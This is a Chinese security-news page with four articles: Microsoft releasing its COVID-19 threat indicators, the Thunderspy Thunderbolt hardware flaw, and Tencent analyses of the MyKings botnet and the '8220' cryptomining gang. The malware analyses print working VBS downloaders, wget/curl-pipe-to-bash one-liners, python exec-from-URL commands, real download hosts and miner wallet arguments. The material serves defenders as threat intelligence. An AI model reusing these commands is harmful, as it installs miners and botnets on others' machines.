分类: 黑客事件

微软向公众开放与新冠病毒相关的黑客攻击活动的威胁数据

据外媒报道,微软周四宣布,该公司正在将其收集的与新冠病毒相关的黑客攻击活动的威胁情报公开。“作为一个安全情报社区,当我们分享的信息能够提供更完整地了解攻击者的转移技术时,我们就会更强大,”微软威胁情报团队在一篇博文中说。“这种更完整的视图使我们都能更主动地保护、检测和防御攻击。” 微软决定开放其feed,以提高人们对攻击者在新冠大流行期间不断变化的技术的认识–尤其是对于那些可能不具备该公司所拥有的广泛可见性的人来说。该安全团队写道:“微软每天处理跨越身份、端点、云端、应用和电子邮件的数万亿个信号,这为我们提供了广泛的COVID-19主题攻击的可视性,使我们能够在整个安全栈中检测、保护和应对这些攻击。” 由26个成员组成的网络安全威胁共享非营利组织 “网络威胁联盟”(Cyber Threat Alliance)总裁兼首席执行官迈克尔-丹尼尔(Michael Daniel)表示,大流行期间犯罪活动的转变首次将目标锁定在使用新平台的人身上。 “总的来说,安全行业的恶意活动数量并没有增加;但是,我们看到这种犯罪活动的重点发生了迅速而急剧的转移,”前白宫网络安全协调员Daniel告诉CyberScoop。“坏人已经试图利用人们的恐惧、整体信息的匮乏以及许多在线平台的首次用户的增加等因素,将重点转移到了COVID-19的相关主题上。” 在网络犯罪分子和国家行为者开始用新冠病毒和医疗保健主题的鱼叉钓鱼邮件或虚假的移动应用程序在全球范围内瞄准受害者几个月后,微软进行了这一举动。微软正在提供的信息包括在大流行病相关的鱼叉钓鱼电子邮件活动中的恶意附件中使用的文件散列指标。其中包括的许多电子邮件诱饵都模仿了世界卫生组织和红十字会的品牌,而其他诱饵似乎是在与目标共享有关COVID-19的信息。 微软分享的283个威胁指标可以通过微软的Graph Security API或Azure Sentinel的GitHub页面获得。 Mandiant Threat Intelligence的高级首席分析师Sarah Jones告诉CyberScoop,这种公开的共享很可能会对致力于打击新冠病毒相关威胁的中小型企业有所帮助。“我们还没有机会观察到微软的这一功能,不过,拥有多种方式整合和查询外部的intel feeds,对于网络防御者来说总是有帮助的。”ones说。“此外,向客户发布高质量的和经过审核的‘Compromise指标’馈送,对于中小型企业来说,可以成为一种力量的倍增器。” Cofense首席技术官Aaron Higbee对这一举措表示欢迎,但他补充说,滥用微软Office 365的网络钓鱼邮件非常猖獗。 “我们赞扬所有的努力,以保护人们免受网络钓鱼攻击的攻击,这些攻击利用了人们对大流行病的恐惧和担忧。”Higbee告诉CyberScoop。“Cofense的客户对微软无法过滤掉网络钓鱼邮件表示出越来越多的不满。当他们得知钓鱼邮件来自于Office 365账户,并且钓鱼套件托管在Office 365上时,他们就会变得特别恼火。我很好奇,在微软选择分享的283个网络钓鱼指标中,有多少个是托管在Office 365内的。” 几个星期前,多个网络安全志愿者团体联合起来,帮助医疗机构在大流行期间应对突发的网络安全威胁。其他公司此前已经宣布,他们正在更广泛地提供服务。   (稿源:cnBeta,封面源自网络。)

威胁长期存在 黑客 5 分钟即可破解 Thunderbolt

你的电脑很可能又被黑客盯上了。近日,据外媒报道,一名荷兰研究人员 Ruytenberg 展示了黑客如何通过 Thunderbolt 实施物理访问进而攻击电脑,并指出了 7 类漏洞 : 固件验证方案不足 弱设备认证方案 未经验证的设备元数据的使用 使用向后兼容性降低攻击级别 未经验证的控制器配置的使用 SPI 闪存接口缺陷 在 Boot 营地没有雷电安全 研究者指出,这些漏洞适用于自 2011年以来所有装有 Thunderbolt 的计算机,并且允许拥有物理访问权限的攻击者从加密的驱动器和内存中快速窃取数据。 更可怕的是,即便你的设备即使处于睡眠模式或锁定的状态、设置安全引导、使用强 BIOS 和操作系统帐户密码以及启用完全磁盘加密,攻击仍然有效,并且这种攻击不会留下任何痕迹,也不需要任何形式的网络钓鱼,还可以从加密驱动器中窃取数据,而完成这一过程只需要 5 分钟。 研究人员将这一漏洞命名为 Thunderspy。值得注意的是,这是个硬件级漏洞,只要几百美元的设备就能攻破该漏洞。 在 Mac 电脑和部分 Windows 电脑上,Thunderbolt 端口能够被用来连接外围设备,比如显示器、高速网络适配器、普通硬盘和容量更大的存储阵列。在笔记本电脑上,一个 Thunderbolt 插接站就可以让你的电脑接入闪存读卡器、电源电缆、HDMI 显示器、以太网以及 USB 鼠标和键盘。 但一直以来,Thunderbolt 有一个让安全研究人员都很担心的问题:因其更快的数据传输速度,并且允许比其他端口更直接地访问计算机内存,所以导致漏洞的风险也更大。 3 个月前,Ruytenberg 向英特尔报告了这一漏洞,经核查,英特尔承认了这一漏洞。 英特尔表示:“虽然潜在的漏洞并不是新出现的,而且在去年的操作系统发布版中就已经解决了,但是研究人员在没有启用这些缓解措施的系统上使用定制的外围设备,演示了新的潜在物理攻击载体。 但他们并没有证明 DMA 攻击能够成功地攻击启用了这些缓解措施的系统。对于所有系统,我们建议遵循标准的安全实践,包括只使用受信任的外围设备和防止未经授权的物理访问计算机。英特尔将继续改进 Thunderbolt 技术的安全性,感谢来自埃因霍芬理工大学的研究人员向我们报告了这一情况。” 不过,Ruytenberg 有不同的看法,因为在实验中,他们没有发现任何一台戴尔电脑安装了上述保护措施,只有部分惠普和联想笔记本安装了。 此外,这些漏洞也无法通过软件更新修复,因为它们本质上与硬件设计有关,即使用户在操作系统中调整了安全设置,也不能完全避免此类攻击,所以只能靠今后重新设计硬件才能完全解决。 也就是说,目前还无法解决这个威胁。黑客如何在无密码解锁的情况下攻入你的电脑的? 为了进一步证明这个漏洞的影响,Ruytenberg 在 youtub 上传了一段分析视频 详情请见:https://www.youtube.com/watch?v=3byNNUReyvE 在演示视频中,他卸下了电脑的后盖,将 SPI 编程器和主板上的雷电控制器连接起来。 然后在另一台电脑上的雷电接口上插入一个自制破解设备,运行 PCI Leech 软件(一种内核插入和攻击工具),通过改变控制 Thunderbolt 端口的固件,允许任何设备访问,而整个过程只用了 5 分钟。 这样一来,攻击者可以永久禁用 Thunderbolt 安全并阻止所有未来的固件更新。该攻击只需要价值约 400 美元的装备,包括一个 SPI 编码器和价值 200 美元的 Thunderbolt 外设。当然,除了上面要拆开笔记本的方法外,Thunderspy 攻击还有一种无需物理侵入的方法。即通过创建任意的雷电设备身份,克隆用户授权的雷电设备,最后获得 PCIe 连接以执行 DMA 攻击。 这样,无需打开电脑外壳,即可绕过目标设备的锁定屏幕。但是,只有将雷电接口的安全性设置为允许受信任设备的默认设置时,这种无需物理侵入的 Thunderspy 攻击才有效。 目前,英特尔尚未发布任何 Thunderspy 漏洞的 CVE 信息,并且不计划发布针对市场上已有系统的修复程序。苹果则决定不为 Thunderspy 提供修复程序。 所以,对于用户来说,怎样保护电脑不被黑客攻击呢?安全研究人员也给出了一些建议。 通过免费的开源工具 Spycheck,验证是否受到 Thunderspy 的攻击: 验证地址:https://thunderspy.io/ 只连接自己的 Thunderbolt 外设;不要把它们借给任何人; 避免开机时无人值守系统,即使屏幕被锁定; 避免让 Thunderbolt 外设无人看管; 存储系统和任何 Thunderbolt 设备(包括 Thunderbolt 供电的显示器)时,确保适当的物理安全; 避免使用睡眠模式(内存挂起)。   (稿源:雷锋网,封面源自网络。)

Mykings 僵尸网络更新基础设施,大量使用 PowerShell 脚本进行“无文件”攻击挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Eyqm-lgQovFaJnk3FHihJQ 一、概述 MyKings僵尸网络2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络本轮活动主要更新点 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手挖矿木马名单中增加了“新冠”挖矿木马; 4.使用挖矿账号登陆,隐藏了钱包地址; 5.新增白利用文件; 6.不同系统版本执行脚本不同; 7.获取windows登陆密码 攻击流程图 二、解决方案 运维人员可参考以下方法手动清除Windows系统感染的挖矿木马,企业用户亦可使用腾讯T-Sec终端安全管理系统(腾讯御点)查杀病毒,参考安全建议提升服务器的安全性。 删除以下病毒文件: C:\Windows\debug\lsmose.exe C:\Windows\debug\lsmos.exe C:\Windows\debug\lsmo.exe C:\Program Files (x86)\Common Files\csrw.exe C:\Progra~1\Common Files\csrw.exe c:\windows\help\lsmosee.exe c:\windows\help\akpls.exe c:\windows\inf\lsmma.exe c:\windows\inf\lsmm.exe c:\windows\inf\lsmmaa.exe c:\windows\system32\new.exe c:\windows\system32\upsupx.exe c:\windows\inf\aspnet\lsma.exe c:\windows\inf\aspnet\lsmab.exe c:\windows\inf\aspnet\lsmaaa.exe c:\windows\inf\aspnet\lsma30.exe c:\windows\inf\aspnet\lsma31.exe c:\\windows\java\java.exe c:\windows\inf\aspnet\lsma12.exe c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\update.exe c:\windows\temp\servtestdos.dll C:\WINDOWS\Fonts\cd c:\windows\help\get.exe c:\windows\inf\aspnet\u.exe c:\windows\inf\winnts.exe c:\windows\temp\svchost.exe c:\windows\temp\conhost1.exe 删除病毒添加的计划任务 Mysa Mysa1 Mysa2 Mysa3 ok oka 删除病毒添加的WMI事件启动项 fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4 安全建议 1.Mysql端口非必要情况不要暴露在公网,使用足够强壮的Mysql口令; 2.修复MS010-17“永恒之蓝”漏洞,服务器暂时关闭不必要的端口(如135、139、445)。 三、详细分析 mykings本次活动通过mssql爆破手段攻击windows服务器,根据系统版本下发不同的脚本。 WIN10以下主要是对windows defender有关闭操作,并且会使用mimikatz导出windows密码。各系统对应的脚本下载链接: Windows 10,http://173.208.139.170:8170/win10.txt Windows 服务器,http://173.208.139.170:8170/sa.xsl Windows xp,http://173.208.139.170:8170/s.xsl Win Vista~Win8,http://173.208.139.170:8170/abc.txt 脚本入口处搜集IP,进程,内存,处理器信息,上传到FTP 接着下载batpower.txt Batpower首先下载kill.txt,主要作用是清理自身旧版本挖矿程序,以固定阵地,删除相应文件: 清理wmi启动项 下载uninstall.txt,卸载多款主流杀毒软件: 之后去ftp服务器下载三个挖矿木马文件,并设置成计划任务: 下载并设置v.sct开机启动,目前无法连接,具体功能暂时无法得知 继续下载执行wmi.txt,主要设置开机下载执行power.txt,s.txt Power.txt及s.txt有多个地址可供下载 Power.txt功能与batpower.txt功能一样。 s.txt会去下载hxxp://173.208.153.130:8130/wpd.rar,这是一个自解压文件,主要功能是清除竞争对手挖矿木马,如:NSABuffMiner、kingminer,还有最新的“新冠”挖矿木马 “coronav2“。 后下载执行hxxp://167.88.180.175:8175/download.txt,里面也会执行挖矿木马。 链接中的g.exe是pplive的loader模块,用做白利用,以下载并执行其他病毒模块。 该模块会根据命令行下载执行文件,不会做任何验证。 u.exe首先获取mirai僵尸网络下载IP 再获取更新地址: 扫描工具msinfo,并对公网和内网进行扫描攻击,包括使用永恒之蓝漏洞、SQL爆破、Telnet爆破、RDP爆破等多种手段: Mirai携带的永恒之蓝攻击模块 max.exe则是暗云Ⅲ木马,攻击流程无变化。 暗云Ⅲ的更新域名及下载链接 1201.exe是基于xmrig 2.0.4版本修改而来,矿机配置存放在资源段TXT中 “url”: “69.197.156.194:80”, “user”: “abc443”, “pass”: “x”, “url”: “win443.xmrpool.ru:443”, “user”: “abcd1443”, “pass”: “x”, 附录 IOCs MD5 74a09ef83de2599529c9a6f0278fdb60 9f86afae88b2d807a71f442891dfe3d4 929c393fcfb72f9af56ce34df88f82bb 539d218039ad0a2c6bf541af95a013bc a8c98125b9d04673f079bcc717e58a71 5364fae1de8db8fa3faf07bfaf2b706f b150d411a1e29e43b6423f19db4fd3ed 94d5e03b2d21f8f0c6d963570ecba6c1 5d461acc19ac7d2a993ddf0d8866cb1a 93515e391ac22a065279cadd8551d2bc bc7fc83ce9762eb97dc28ed1b79a0a10 d9c32681d65c18d9955f5db42154a0f3 f89cbaf4dbe490787adf5eeb9304d785 44ac832c2b71b4874e544e2b04a72834 6d0bb14c2f5a384bd5073a45db12dabe fa74df0a9a42d29018146520ae0b5585 9459494db3750da9fab3d9deaf4d1106 598ba6f7a900a78666bcb9774620f643 2293f46b3c293e5c637343447e582fdb 8e8f427d93e809137283abfad825b33d b6c1dacca555c61a26907296a04d10de a1783a56738b17ba117b5518399748b0 64ce5ad470cfa503882a3dfac382c6b4 a26ba601674371229eab93a585a79e6b 5c56774156b5fefe2e465b4546006f9a 61e1f73f2e8f566f959e3ffca120aa8b a8557ea0f4034ecf855087e3200354ac 2da63739662c5ea7231c930b61f73a72 5e87427c66ecb84a85700b1180d115f2 f18e88259b1043a6e06c9a16d4c0475e 1a7dcb9970287539774c7ade1cb7e483 e827621c5185488122da57ac16d1fca0 795dd160e8073d23f5c6954602bf3b89 a5b75dfb3b3358ad1a2ef8025ddebb29 cfa550296b848293f912fd625c114015 IP 208.110.71.194 80.85.152.247 66.117.2.182 70.39.124.70 150.107.76.227 103.213.246.23 103.106.250.161 103.106.250.162 144.208.127.215 167.88.180.175 172.83.155.170 173.208.133.114 173.208.153.130 173.247.239.186 192.236.160.237 199.168.100.74 23.236.69.114 74.222.14.97 66.117.6.174 DOMAIN www.upme0611.info mbr.kill0604.ru js.ftp1202.site wmi.1103bye.xyz ok.xmr6b.ru URL hxxp://167.88.180.175:8175/kill.txt hxxp://js.ftp1202.site:280/v.sct hxxp://167.88.180.175:8175/wmi.txt hxxp://173.208.153.130:8130/wpd.rar hxxp://167.88.180.175:8175/download.txt hxxp://js.ftp1202.site:280/v.sct hxxp://wmi.1103bye.xyz:8080/power.txt hxxp://172.83.155.170:8170/power.txt hxxp://192.236.160.237:8237/power.txt hxxp://144.208.127.215:8215/power.txt hxxp://103.106.250.161:8161/power.txt hxxp://103.106.250.162:8162/power.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://173.247.239.186:8186/g.exe hxxp://173.247.239.186:8186/u.exe hxxp://199.168.100.74:8074/max.exe hxxp://199.168.100.74:8074/1201.rar hxxp://23.236.69.114:8114/dll/64npf.sys hxxp://23.236.69.114:8114/update.txt hxxp://23.236.69.114/ups.html hxxp://23.236.69.114:8114/dll/wpcap.dll hxxp://23.236.69.114:8114/dll/packet.dll hxxp://23.236.69.114:8114/dll/npptools.dll hxxp://173.208.133.114:8114/upsupx.exe hxxp://www.upme0611.info/address.txt hxxp://mbr.kill0604.ru/cloud.txt hxxp://74.222.14.97/xpxmr.dat hxxp://ok.xmr6b.ru/xpxmr.dat hxxp://ok.xmr6b.ru/ok/wpd.html hxxp://66.117.6.174/wpdmd5.txt hxxp://66.117.6.174/wpdtest.dat hxxp://66.117.6.174/ver.txt hxxp://66.117.6.174/shellver.txt hxxp://66.117.6.174/csrs.exe hxxp://23.236.69.114:8114/ups.html hxxp://66.117.6.174:8114/update.txt hxxp://66.117.6.174/wpd.jpg hxxp://66.117.6.174/my1.html hxxp://172.83.155.170:280/v.sct hxxp://139.5.177.19:8019/blue.txt 参考链接 https://s.tencent.com/research/report/622.html https://mp.weixin.qq.com/s/KdeF1eaM-Dq1z_wOIb9_oA https://www.freebuf.com/column/187489.html

“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,预备发起DDoS攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ   一、背景 腾讯安全威胁情报中心检测到“8220”挖矿木马变种攻击。“8220”挖矿团伙擅长利用WebLogic、JBoss反序列化漏洞,Redis、Hadoop未授权访问漏洞等Web漏洞攻击服务器挖矿。近期我们发现该团伙在攻击活动中通过Apache Struts远程代码执行漏洞(CVE-2017-5638)、Tomcat弱口令爆破进行传播的木马大幅增加。 木马在横向移动阶段会利用Python实现的Redis未授权漏洞访问漏洞对随机生成的约16万个IP进行扫描攻击,并且利用植入的shell脚本hehe.sh继续利用已有公钥认证记录的机器建立SSH连接进行内网扩散,最终在失陷机器植入多款门罗币挖矿木马以及Tsunami僵尸网络木马,后者被该团伙用来进行DDoS攻击。 “8220”挖矿木马团伙的攻击目标包括Windows和Linux服务器,在其使用的FTP服务器上,可以发现针对不同操作系统的攻击模块。该团伙释放挖矿木马时,会检查服务器是否有其他挖矿木马运行,将所有竞争挖矿木马进程结束,以独占服务器资源。 根据代码的相似性、C2关联性、挖矿时使用的相同门罗币钱包以及配置文件解密方法、相似的FTP服务器,腾讯安全专家认为,2020年初出现的StartMiner与“8220”挖矿木马属于同一团伙。该团伙当前版本恶意程序与C2服务器的通信已不再使用“8220”端口,根据近期捕获到的样本对其攻击偏好使用的文件名进行总结,发现其具有使用多种脚本包括VBS、PHP、Python、Powershell、Shell进行组合攻击的特点。 二、解决方案 企业运维人员可参考以下方法手动清除Linux和Windows系统感染的挖矿木马,参考安全建议提升服务器的安全性。 Linux系统 a. Kill进程/tmp/sh、/tmp/x32b、/tmp/x64b b. 删除文件 /tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、 /tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481) /tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、 /tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F) c.  删除包含“www.jukesxdbrxd.xyz”、“107.189.11.170”的crontab计划任务 安全建议: a. Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令 b. Tomcat服务器配置高强度密码认证 c.  设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes Windows系统 a. 杀死进程isassx.exe、steamhuby.exe、issaasss、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe b. 删除文件: c:\windows\temp\app.vbs c:\windows\temp\apps.vbs C:\Windows\Temp\ready.exe C:\ProgramData\guvpgnkpwv\steamhuby.exe C:\ProgramData\tumtkffywq\issaasss C:\Windows\temp\12.exe C:\Windows\temp\12.exe C:\Windows\Temp\mess.exe %HOMEPATH%\why.ps1 %HOMEPATH%\schtasks.ps1 c.  删除执行内容包含“why.ps1、why2.ps1、why3.ps1、kkmswx.ps1”的计划任务 安全建议: 及时修复Apache Struts高危漏洞; Tomcat服务器配置高强度密码认证。 推荐政府机构、大中型企业、科研单位采用腾讯安全完整解决方案全面提升信息系统的安全性。 腾讯安全解决方案部署示意图(图片可放大) 政企用户可根据业务应用场景部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,提升整体网络抗攻击能力。 腾讯安全系列产品应对8220挖矿木马的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截Redis未授权访问漏洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持Apache Struts远程命令执行漏洞、Redis未授权访问漏洞的检测; 2)已支持查杀8220挖矿木马家族样本。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受Apache Struts远程命令执行漏洞、Redis未授权访问漏洞影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)对利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵相关的网络通信。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 三、利用Struts漏洞(CVE-2017-5638)入侵服务器挖矿 Apache Struts是一款用于创建企业级Java Web应用的开源框架,Struts2存在远程代码执行的严重漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。 该漏洞能允许黑客远程代码执行,相当于整台服务器已托管给黑客,黑客可以利用此漏洞获取web应用的源程序,修改web应用内容,获取数据库密码并盗取数据库信息,更改系统代码,更改数据库密码等等。 黑客批量扫描Web服务器并针对存在CVE-2017-5638漏洞的机器进行攻击,然后通过shell写入VBS脚本文件app.vbs并启动运行。 c:\windows\temp\app.vbs代码内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://www.jukesxdbrxd.xyz/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/kmkww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/kmkww.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/kmkww.exe”) app.vbs下载得到挖矿木马母体steamhuby.exe,该样本拷贝自身到C:\ProgramData\guvpgnkpwv\steamhuby.exe,然后访问下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。 该钱包目前在公开矿池pool.hashvault.pro挖矿获得30个XMR,但是由于其使用多个私有矿池挖矿,实际收益会远大于这个数目。 漏洞攻击时利用Shell执行的另一段VBS代码apps.vbs下载的挖矿木马为ww.exe,存放至C:/Windows/temp/12.exe或C:/Windows/temp/13.exe,并直接传入挖矿参数开启挖矿。 c:\windows\temp\apps.vbs内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://jukesbrxd.xyz/ww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/12.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/13.exe –donate-level=1 -k -o 37.59.162.30:5790 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 四、爆破攻击Tomcat服务器挖矿 该团伙利用漏洞攻击成功后,会向目标服务器植入多款挖矿木马进行门罗币挖矿。 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。 黑客针对Tomcat服务器进行扫描和暴力破解,然后将保存在FTP服务器上的PHP木马和VM木马下载到失陷机器,利用php木马继续下载挖矿木马。 Win.php 通过system执行cmd命令,利用certutil.exe下载ww.exe,存放至c:\windows\temp\kkw2.exe,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B 创建脚本kkmw.txt、kksw.txt,利用ftp命令从服务器ftp[:]//107.189.11.170下载kmkww.exe、ww.exe,传入挖矿参数启动挖矿; 创建下载脚本poc.vbs,并写入以下代码,下载ww.exe并启动挖矿: Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”,”http://107.189.11.170/ww.exe”,false objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type=1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile “C:\Windows\Temp\mess.exe” objADOStream.Close Set objADOStream=NothingEnd if Set objXMLHTTP=Nothing Set objShell=CreateObject(“WScript.Shell”) objShell.Exec(“C:\Windows\Temp\mess.exe –donate-level 1 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 通过Powershell命令下载和执行3.ps1、2.ps1。 创建poc2.vbs,写入与poc.vbs类似的下载代码,下载kmkww.exe启动挖矿。 Linx.php 修改DNS服务器为8.8.8.8 安装Linux下载工具: apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; 利用多个下载工具下载bash脚本2start.jpg并执行,运行后rm -rf删除文件: get -q -O – http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O – http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; 解码base64编码的python脚本并运行,最后history -c删除记录。 Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/a.py”).read())’ Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/b.py”).read())’ Powershell 木马攻击Windows系统使用的3.ps1具有以下功能: 下载ww32.exe、kkw2.exe并保存至temp目录。 找到进程可能是其他挖矿木马的端口连接,杀死对应进程 将Powershell脚本why.ps1、why4.ps1安装为计划任务 “Update service for Oracle productsm”,并删除旧的计划任务。 匹配文件名,退出杀软进程和竞品挖矿木马进程,包括ddg.exe,然后启动自己的挖矿进程kkw2.exe。 Python 攻击Linux系统使用的linx.php会执行Python脚本a.py,该脚本负责下载32位、64位Linux系统版本挖矿木马i686、x86_64,并通过命令chomd设置读、写、运行三种权限,然后运行挖矿。 i686、x86_64是由XMRig程序编译的Linux版本挖矿木马 五、组建Tsunami僵尸网络进行DDoS攻击 b.py则下载32位、64位基于Linux系统的Tsunami(海啸)僵尸网络木马x64b、x32b。 Tsunami会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,攻击成功会会导致僵尸网络完全控制设备。Tsunami通过IRC协议与C2服务器通信,接收指令并发起HTTP、UDP类型的DDoS攻击。 六、横向移动 利用Redis未授权访问漏洞 木马用于扫描攻击的ss2.py、ss3.py经过base64编码,解码后的内容都是下载new.py执行。 